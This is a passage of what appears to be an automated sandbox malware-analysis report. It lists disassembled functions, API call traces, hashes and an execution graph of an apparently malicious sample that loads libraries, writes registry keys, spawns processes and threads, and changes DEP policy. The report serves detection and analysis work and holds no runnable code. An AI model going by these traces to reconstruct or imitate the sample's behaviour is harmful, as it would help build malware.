                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00B072DF
                                                                            • RtlFreeHeap.NTDLL ref: 00B072E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: 75e6f81cef7cd096419c5f7521a9a74d44b0d5e856e21e19464a27893b6d2504
                                                                            • Instruction ID: 9ee754b4d2bf73b6a8bff10e3c1ed676e300a89eb4fa399b6563c7e626b5e52e
                                                                            • Opcode Fuzzy Hash: 75e6f81cef7cd096419c5f7521a9a74d44b0d5e856e21e19464a27893b6d2504
                                                                            • Instruction Fuzzy Hash: 55D0C936485150ABE7503FE0BC0DF863E28FF4B313F010401F205A30608EB449108B62
                                                                            Function 00B09CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                              • Part of subcall function 00B0C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00B0C5BD
                                                                              • Part of subcall function 00B0C570: RtlFreeHeap.NTDLL ref: 00B0C5C4
                                                                              • Part of subcall function 00B0C570: _setjmp3.MSVCRT ref: 00B0C630
                                                                            • _wcsupr.MSVCRT ref: 00B1C21F
                                                                              • Part of subcall function 00B11A47: memset.MSVCRT ref: 00B11AE2
                                                                              • Part of subcall function 00B11A47: ??_V@YAXPAX@Z.MSVCRT(00B12229,?,00B12229,00000000,-00000105,?,00000000,00000000), ref: 00B11BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                            • String ID: FOR$ IF
                                                                            • API String ID: 3818062306-2924197646
                                                                            • Opcode ID: ad4a4332714d9ab62a7e7bc9def6eded095e68bc8766bf4158ea632365e063d5
                                                                            • Instruction ID: 249ea9dc8d16540f8f2fcd3f7bc3f78ea36814ae73a36be1a4f3325a33452c8a
                                                                            • Opcode Fuzzy Hash: ad4a4332714d9ab62a7e7bc9def6eded095e68bc8766bf4158ea632365e063d5
                                                                            • Instruction Fuzzy Hash: 0D5107217802025BDB296B7888517BB2AE2EF91B54FA841F5D906DB2D6FF71DD81C380
                                                                            Function 00B2BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • wcschr.MSVCRT ref: 00B2BF88
                                                                            • memcpy.MSVCRT(00000000,?,00B29E02,00B2CD80,00000030,00B2448F,?,?,?,00000001), ref: 00B2C008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocProcessmemcpywcschr
                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                            • API String ID: 3241892172-381716982
                                                                            • Opcode ID: 5bd4376285be2adadfc96837106d86a03679bf425627e4dfa98ef624be10c98a
                                                                            • Instruction ID: 4c53cad7f2b286be2d0e28a74c4f1f3d335551ee81e492573091501bc3533896
                                                                            • Opcode Fuzzy Hash: 5bd4376285be2adadfc96837106d86a03679bf425627e4dfa98ef624be10c98a
                                                                            • Instruction Fuzzy Hash: CF612271E04225DBCF18CF69E990AADBBF1FF48314B2481AEE81AE7250DB719D418F54
                                                                            Function 00B0ABC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B0ABE3
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B0CF10: _setjmp3.MSVCRT ref: 00B0CF28
                                                                              • Part of subcall function 00B0CF10: iswspace.MSVCRT ref: 00B0CF6B
                                                                              • Part of subcall function 00B0CF10: wcschr.MSVCRT ref: 00B0CF8D
                                                                              • Part of subcall function 00B0CF10: iswdigit.MSVCRT ref: 00B0CFEE
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000,00000000,00000002), ref: 00B1CB58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                            • String ID: REM/?
                                                                            • API String ID: 49548326-4093888634
                                                                            • Opcode ID: 5d24036834e884c707656617d5e55a61391607bd2506aec63cda7a9abdfdb5a4
                                                                            • Instruction ID: 07ae0db54e4a2dd26cbf3854358f8a2ab6105599fa907c78264ac3e1e3c7ce71
                                                                            • Opcode Fuzzy Hash: 5d24036834e884c707656617d5e55a61391607bd2506aec63cda7a9abdfdb5a4
                                                                            • Instruction Fuzzy Hash: A031E632754305ABE724EB74AC52B6B7BE5EF80710F2059BAE502CB2D1DEB1CD418356
                                                                            Function 00B25679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00B2CD40,0000001C,00B26901), ref: 00B256A8
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00B25778
                                                                              • Part of subcall function 00B264DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B2650F
                                                                              • Part of subcall function 00B264DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00), ref: 00B26545
                                                                              • Part of subcall function 00B264DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26553
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                            • String ID: Software\Classes
                                                                            • API String ID: 1047774138-1656466771
                                                                            • Opcode ID: 42ca7bbf0065f1eded0c680aab44957c8d8f948ae690c759955cad9e0c488c5c
                                                                            • Instruction ID: cd1fd71b5e492e033a12edd7863bb68bbd5413f294615926a79e53b967cb95a0
                                                                            • Opcode Fuzzy Hash: 42ca7bbf0065f1eded0c680aab44957c8d8f948ae690c759955cad9e0c488c5c
                                                                            • Instruction Fuzzy Hash: 87315471E54724DBDB28AFA8A8556AD76F1EF48710F1484AEE406B72E1EE705C408B60
                                                                            Function 00B25E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00B2CCE0,0000001C,00B26931), ref: 00B25E32
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00B25EFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$CloseOpeniswspace
                                                                            • String ID: Software\Classes
                                                                            • API String ID: 2439148603-1656466771
                                                                            • Opcode ID: b73cba7278120b241deb928d7ef9fc2191b541d0bb1423c645156528154f377e
                                                                            • Instruction ID: 6aaab7a41ba8a7c0d4748da9b9b5eeb43fe1fe44092aa4891a7120e0b3b3d938
                                                                            • Opcode Fuzzy Hash: b73cba7278120b241deb928d7ef9fc2191b541d0bb1423c645156528154f377e
                                                                            • Instruction Fuzzy Hash: 49319571E147248FDB24EFA8D8516AE77F5EF48710F2180AEE00AB72D1EE715D418B54
                                                                            Function 00B0AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00B0B11F), ref: 00B1CB8B
                                                                            • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00B1CC2D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleTitle
                                                                            • String ID: -
                                                                            • API String ID: 3358957663-3695764949
                                                                            • Opcode ID: 97a29f5c8df933572694e32be7a0895d1cc7d6c4790221d45f948134168ec632
                                                                            • Instruction ID: d4c909d9daae7f0cefe19b06b8f388a94b6b9e2ca79d82f41113be3cdd2da1f8
                                                                            • Opcode Fuzzy Hash: 97a29f5c8df933572694e32be7a0895d1cc7d6c4790221d45f948134168ec632
                                                                            • Instruction Fuzzy Hash: 88213B317002049BC729AB6CD8957BE7FE6EB80704F6845ECE902573D4DE749D8687C1
                                                                            Function 00B28AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B28AC9
                                                                            • printf.MSVCRT ref: 00B28B24
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                            • String ID: %3d
                                                                            • API String ID: 2845598586-2138283368
                                                                            • Opcode ID: 03d68e088b3e95f0a74b3562ca74b43c12300f2620dc6bb5573724fced326e48
                                                                            • Instruction ID: 1a1458621e05fdd7910cf5358e1da9bfdffb64ae8b17d904d2a918e22abd6791
                                                                            • Opcode Fuzzy Hash: 03d68e088b3e95f0a74b3562ca74b43c12300f2620dc6bb5573724fced326e48
                                                                            • Instruction Fuzzy Hash: CB012D71650204BBE7116F559C87FDB3EEDDB85BE0F044095FB08950C1DAB19DA0C6B1
                                                                            Function 00B0AB7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswspacewcschr
                                                                            • String ID: =,;
                                                                            • API String ID: 287713880-1539845467
                                                                            • Opcode ID: 0d1517504c11dad99049351b5c09aee189818026c048afa8a4dc81378795b558
                                                                            • Instruction ID: 46cc38b58a17ddcd9b9e56565a69951cac60342d2b0282a737a7c14efd22d302
                                                                            • Opcode Fuzzy Hash: 0d1517504c11dad99049351b5c09aee189818026c048afa8a4dc81378795b558
                                                                            • Instruction Fuzzy Hash: 8DE04F376047229AD634065DBC58877BEDBDFE7B6131A08DBFC04A31D4FAA04C408197

                                                                            Execution Graph

                                                                            Execution Coverage:2%
                                                                            Dynamic/Decrypted Code Coverage:99%
                                                                            Signature Coverage:3.6%
                                                                            Total number of Nodes:1190
                                                                            Total number of Limit Nodes:44
                                                                            execution_graph 93573 469bea8 93575 469beb4 _swprintf ___FrameUnwindToState 93573->93575 93574 469bec2 93589 46a062d 20 API calls __dosmaperr 93574->93589 93575->93574 93577 469beec 93575->93577 93584 46a5909 EnterCriticalSection 93577->93584 93579 469bec7 pre_c_initialization ___FrameUnwindToState 93580 469bef7 93585 469bf98 93580->93585 93584->93580 93587 469bfa6 93585->93587 93586 469bf02 93590 469bf1f LeaveCriticalSection std::_Lockit::~_Lockit 93586->93590 93587->93586 93591 46a97ec 37 API calls 2 library calls 93587->93591 93589->93579 93590->93579 93591->93587 93592 4694918 93593 4694924 ___FrameUnwindToState 93592->93593 93619 4694627 93593->93619 93595 469492b 93597 4694954 93595->93597 93921 4694a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 93595->93921 93603 4694993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93597->93603 93630 46a42d2 93597->93630 93601 4694973 ___FrameUnwindToState 93602 46949f3 93634 4694ba5 93602->93634 93603->93602 93923 46a3487 36 API calls 5 library calls 93603->93923 93612 4694a15 93613 4694a1f 93612->93613 93925 46a34bf 28 API calls _Atexit 93612->93925 93615 4694a28 93613->93615 93926 46a3462 28 API calls _Atexit 93613->93926 93927 469479e 13 API calls 2 library calls 93615->93927 93618 4694a30 93618->93601 93620 4694630 93619->93620 93928 4694cb6 IsProcessorFeaturePresent 93620->93928 93622 469463c 93929 4698fb1 10 API calls 4 library calls 93622->93929 93624 4694641 93625 4694645 93624->93625 93930 46a415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93624->93930 93625->93595 93627 469464e 93628 469465c 93627->93628 93931 4698fda 8 API calls 3 library calls 93627->93931 93628->93595 93631 46a42e9 93630->93631 93932 469502b 93631->93932 93633 469496d 93633->93601 93922 46a4276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 93633->93922 93940 4696f10 93634->93940 93636 4694bb8 GetStartupInfoW 93637 46949f9 93636->93637 93638 46a4223 93637->93638 93942 46af0d9 93638->93942 93640 46a422c 93641 4694a02 93640->93641 93946 46a6895 36 API calls 93640->93946 93643 466ea00 93641->93643 93948 467cbe1 LoadLibraryA GetProcAddress 93643->93948 93645 466ea1c GetModuleFileNameW 93953 466f3fe 93645->93953 93647 466ea38 93968 46620f6 93647->93968 93650 46620f6 28 API calls 93651 466ea56 93650->93651 93974 467beac 93651->93974 93655 466ea68 94000 4661e8d 93655->94000 93657 466ea71 93658 466ea84 93657->93658 93659 466eace 93657->93659 94264 466fbee 97 API calls 93658->94264 94006 4661e65 93659->94006 93662 466eade 93666 4661e65 22 API calls 93662->93666 93663 466ea96 93664 4661e65 22 API calls 93663->93664 93665 466eaa2 93664->93665 94265 4670f72 36 API calls __EH_prolog 93665->94265 93667 466eafd 93666->93667 94011 466531e 93667->94011 93670 466eb0c 94016 4666383 93670->94016 93671 466eab4 94266 466fb9f 78 API calls 93671->94266 93675 466eabd 94267 466f3eb 71 API calls 93675->94267 93680 4661fd8 11 API calls 93683 466ef36 93680->93683 93682 4661fd8 11 API calls 93684 466eb36 93682->93684 93924 46a3396 GetModuleHandleW 93683->93924 93685 4661e65 22 API calls 93684->93685 93686 466eb3f 93685->93686 94033 4661fc0 93686->94033 93688 466eb4a 93689 4661e65 22 API calls 93688->93689 93690 466eb63 93689->93690 93691 4661e65 22 API calls 93690->93691 93692 466eb7e 93691->93692 93693 466ebe9 93692->93693 94268 4666c59 93692->94268 93695 4661e65 22 API calls 93693->93695 93699 466ebf6 93695->93699 93696 466ebab 93697 4661fe2 28 API calls 93696->93697 93698 466ebb7 93697->93698 93701 4661fd8 11 API calls 93698->93701 93700 466ec3d 93699->93700 93705 4673584 3 API calls 93699->93705 94037 466d0a4 93700->94037 93702 466ebc0 93701->93702 94273 4673584 RegOpenKeyExA 93702->94273 93704 466ec43 93706 466eac6 93704->93706 94040 467b354 93704->94040 93712 466ec21 93705->93712 93706->93680 93710 466ec5e 93713 466ecb1 93710->93713 94057 4667751 93710->94057 93711 466f38a 94351 46739e4 30 API calls 93711->94351 93712->93700 94276 46739e4 30 API calls 93712->94276 93716 4661e65 22 API calls 93713->93716 93719 466ecba 93716->93719 93729 466ecc6 93719->93729 93730 466eccb 93719->93730 93720 466f3a0 94352 46724b0 65 API calls ___scrt_get_show_window_mode 93720->94352 93722 466ec87 93724 4661e65 22 API calls 93722->93724 93723 466ec7d 94277 4667773 30 API calls 93723->94277 93737 466ec90 93724->93737 93725 466f3aa 93727 467bcef 28 API calls 93725->93727 93732 466f3ba 93727->93732 93728 466ec82 94278 466729b 98 API calls 93728->94278 94280 4667790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 93729->94280 93731 4661e65 22 API calls 93730->93731 93735 466ecd4 93731->93735 94167 4673a5e RegOpenKeyExW 93732->94167 94061 467bcef 93735->94061 93737->93713 93741 466ecac 93737->93741 93738 466ecdf 94065 4661f13 93738->94065 94279 466729b 98 API calls 93741->94279 93745 4661f09 11 API calls 93747 466f3d7 93745->93747 93749 4661f09 11 API calls 93747->93749 93751 466f3e0 93749->93751 93750 4661e65 22 API calls 93752 466ecfc 93750->93752 94170 466dd7d 93751->94170 93756 4661e65 22 API calls 93752->93756 93758 466ed16 93756->93758 93757 466f3ea 93759 4661e65 22 API calls 93758->93759 93760 466ed30 93759->93760 93761 4661e65 22 API calls 93760->93761 93762 466ed49 93761->93762 93763 466edb6 93762->93763 93764 4661e65 22 API calls 93762->93764 93765 466edc5 93763->93765 93771 466ef41 ___scrt_get_show_window_mode 93763->93771 93769 466ed5e _wcslen 93764->93769 93766 466edce 93765->93766 93794 466ee4a ___scrt_get_show_window_mode 93765->93794 93767 4661e65 22 API calls 93766->93767 93768 466edd7 93767->93768 93770 4661e65 22 API calls 93768->93770 93769->93763 93772 4661e65 22 API calls 93769->93772 93773 466ede9 93770->93773 94341 4673733 RegOpenKeyExA 93771->94341 93774 466ed79 93772->93774 93776 4661e65 22 API calls 93773->93776 93777 4661e65 22 API calls 93774->93777 93778 466edfb 93776->93778 93779 466ed8e 93777->93779 93782 4661e65 22 API calls 93778->93782 94281 466da6f 93779->94281 93780 466ef8c 93781 4661e65 22 API calls 93780->93781 93783 466efb1 93781->93783 93785 466ee24 93782->93785 94087 4662093 93783->94087 93788 4661e65 22 API calls 93785->93788 93787 4661f13 28 API calls 93790 466edad 93787->93790 93791 466ee35 93788->93791 93793 4661f09 11 API calls 93790->93793 94339 466ce34 45 API calls _wcslen 93791->94339 93792 466efc3 94093 46737aa RegCreateKeyA 93792->94093 93793->93763 94077 4673982 93794->94077 93798 466eede ctype 93803 4661e65 22 API calls 93798->93803 93799 466ee45 93799->93794 93801 4661e65 22 API calls 93802 466efe5 93801->93802 94099 469bb2c 93802->94099 93804 466eef5 93803->93804 93804->93780 93808 466ef09 93804->93808 93807 466effc 94344 467ce2c 87 API calls ___scrt_get_show_window_mode 93807->94344 93810 4661e65 22 API calls 93808->93810 93809 466f01f 93814 4662093 28 API calls 93809->93814 93812 466ef12 93810->93812 93815 467bcef 28 API calls 93812->93815 93813 466f003 CreateThread 93813->93809 95028 467d4ee 10 API calls 93813->95028 93816 466f034 93814->93816 93817 466ef1e 93815->93817 93818 4662093 28 API calls 93816->93818 94340 466f4af 104 API calls 93817->94340 93820 466f043 93818->93820 94103 467b580 93820->94103 93821 466ef23 93821->93780 93823 466ef2a 93821->93823 93823->93706 93825 4661e65 22 API calls 93826 466f054 93825->93826 93827 4661e65 22 API calls 93826->93827 93828 466f066 93827->93828 93829 4661e65 22 API calls 93828->93829 93830 466f086 93829->93830 93831 469bb2c 40 API calls 93830->93831 93832 466f093 93831->93832 93833 4661e65 22 API calls 93832->93833 93834 466f09e 93833->93834 93835 4661e65 22 API calls 93834->93835 93836 466f0af 93835->93836 93837 4661e65 22 API calls 93836->93837 93838 466f0c4 93837->93838 93839 4661e65 22 API calls 93838->93839 93840 466f0d5 93839->93840 93841 466f0dc StrToIntA 93840->93841 94127 4669e1f 93841->94127 93844 4661e65 22 API calls 93845 466f0f7 93844->93845 93846 466f103 93845->93846 93847 466f13c 93845->93847 94345 469455e 22 API calls 3 library calls 93846->94345 93850 4661e65 22 API calls 93847->93850 93849 466f10c 93851 4661e65 22 API calls 93849->93851 93852 466f14c 93850->93852 93853 466f11f 93851->93853 93854 466f194 93852->93854 93855 466f158 93852->93855 93856 466f126 CreateThread 93853->93856 93858 4661e65 22 API calls 93854->93858 94346 469455e 22 API calls 3 library calls 93855->94346 93856->93847 95026 467a045 103 API calls __EH_prolog 93856->95026 93860 466f19d 93858->93860 93859 466f161 93861 4661e65 22 API calls 93859->93861 93863 466f207 93860->93863 93864 466f1a9 93860->93864 93862 466f173 93861->93862 93865 466f17a CreateThread 93862->93865 93866 4661e65 22 API calls 93863->93866 93867 4661e65 22 API calls 93864->93867 93865->93854 95030 467a045 103 API calls __EH_prolog 93865->95030 93868 466f210 93866->93868 93869 466f1b9 93867->93869 93870 466f255 93868->93870 93871 466f21c 93868->93871 93872 4661e65 22 API calls 93869->93872 94152 467b69e 93870->94152 93873 4661e65 22 API calls 93871->93873 93874 466f1ce 93872->93874 93876 466f225 93873->93876 94347 466da23 31 API calls 93874->94347 93882 4661e65 22 API calls 93876->93882 93878 4661f13 28 API calls 93879 466f269 93878->93879 93881 4661f09 11 API calls 93879->93881 93884 466f272 93881->93884 93885 466f23a 93882->93885 93883 466f1e1 93886 4661f13 28 API calls 93883->93886 93887 466f27e CreateThread 93884->93887 93888 466f27b SetProcessDEPPolicy 